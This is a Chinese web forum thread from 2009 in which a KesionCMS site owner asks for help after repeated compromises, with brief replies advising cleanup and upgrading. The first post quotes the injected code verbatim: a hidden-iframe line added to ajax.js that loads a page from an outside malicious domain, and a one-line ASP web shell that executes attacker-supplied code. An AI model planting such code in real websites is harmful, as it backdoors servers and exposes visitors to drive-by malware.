账号通
    

账号  

密码  

1803

查看

3

回复
主题:[求助]科汛做的站,老被挂木马,求助 [收藏主题] 转到:  
flover 当前离线

70

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:321 分
登录次数:33 次
注册时间:2008/11/23
最后登录:2011/3/9
flover 发表于:2009/3/11 21:16:00   | 只看该作者 查看该作者主题 楼主 
科汛智能建站系统

用科汛5.03做的网站,三番五次被挂木马,现在求助,他们把ajax.js文件增加了document.writeln("<iframe src=http:\/\/www.bg8028.cn\/one\/a15.htm width=50 height=0><\/iframe>")

并且在wwwroot下增加了一个文件,代码是这样写的<%if request ("x")<>""then session("shs")=request("x"):end if:if session("shs")<>"" then execute session("shs")%>现在求助啊,漏洞在哪里

谢谢了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
cms2007 当前离线

4445

主题

8

广播

15

粉丝
添加关注
级别:超级版主

用户积分:23396 分
登录次数:1515 次
注册时间:2007/8/7
最后登录:2022/12/6
cms2007 发表于:2009/3/13 10:29:00   | 只看该作者 查看该作者主题 沙发 
做在线知识付费 选科汛云开店

http://bbs.kesion.com/dispbbs.asp?boardid=42&Id=48882

 

参考安全教程,做好安全工作,把恶意代码找出来彻底删除,另外建议升级到最新版本

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
veryp 当前离线

3738

主题

328

广播

29

粉丝
添加关注
级别:大三

用户积分:14990 分
登录次数:1155 次
注册时间:2006/5/29
最后登录:2023/3/28
veryp 发表于:2009/3/13 10:01:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线考试系统(NET)

这个跟什么做的无关吧,只要做好安全准备。

科汛是开放的,某些决心眼的想搞破比较容易了解情况。http://www.y7711.com我的用时候也被挂的。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
flover 当前离线

70

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:321 分
登录次数:33 次
注册时间:2008/11/23
最后登录:2011/3/9
flover 发表于:2009/3/12 21:17:00   | 只看该作者 查看该作者主题 板凳 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.78613秒 powered by KesionCMS 9.0